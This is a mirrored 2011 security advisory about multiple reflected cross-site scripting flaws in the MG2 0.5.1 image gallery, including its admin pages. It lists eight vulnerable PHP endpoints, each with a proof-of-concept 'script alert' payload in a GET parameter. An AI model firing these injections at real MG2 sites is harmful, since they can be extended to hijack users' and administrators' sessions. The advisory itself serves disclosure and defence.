Vulners
Lucene search
MG2 0.5.1 Multiple XSS Vulnerabilities
<html><body><p>###########################################################
# #
# MG2 0.5.1 Multiple XSS Vulnerabilities #
# #
# #
# Vendor: MiniGal #
# Product web page: http://www.minigal.dk #
# Affected version: 0.5.1 #
# #
# Summary: MG2 is the sequel to the popular #
# image gallery script MiniGal. One of the #
# highlights of MG2 is, that it supports PHP #
# running in safe mode which is unsupported #
# by almost all other dynamic image gallery #
# scripts on the web. #
# #
# Desc: MG2 suffers from multiple XSS vulns. #
# Several parameters are vulnerable that are #
# not sanitized before being returned to the #
# user. This can be exploited to execute #
# arbitrary HTML and script code in a user's #
# browser session in context of an affected #
# site. #
# #
# Tested on: MS WinXP Pro SP3 (EN), XAMPP #
# #
# Vulnerability discovered by: LiquidWorm #
# #
# Advisory ID: ZSL-2011-4993 #
# #
# #
# 03.02.2011 #
# #
# #
###########################################################
| |
| |
| |
.-----0------------------------------------------0-----.
| |
| |
| /mg2/skins/rounded/templates/thumbnails_password.php |
| - param(GET): list=25<script>alert(1)</script> |
| - param(GET): id=25<script>alert(1)</script> |
| |
| /mg2/skins/rounded/templates/viewimage_comments.php |
| - param(GET): id=31<script>alert(1)</script> |
| |
| /mg2/skins/admin/admin1_menu.php |
| - param(GET): list=41<script>alert(1)</script> |
| |
| /mg2/skins/admin/admin2_comments.php |
| - param(GET): list=45<script>alert(1)</script> |
| |
| /mg2/skins/admin/admin2_edit.php |
| - param(GET): editID=53<script>alert(1)</script> |
| |
| /mg2/skins/admin/admin2_newfolder.php |
| - param(GET): list=59<script>alert(1)</script> |
| |
| /mg2/skins/admin/admin3_folders.php |
| - param(GET): list=71<script>alert(1)</script> |
| |
| |
*------------------------------------------------------*
Created by:
MiniAdvisory Creator v1.0.3g
2011 � Zero Science Lab
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Feb 2011 00:00Current
6.1Medium risk
Vulners AI Score6.1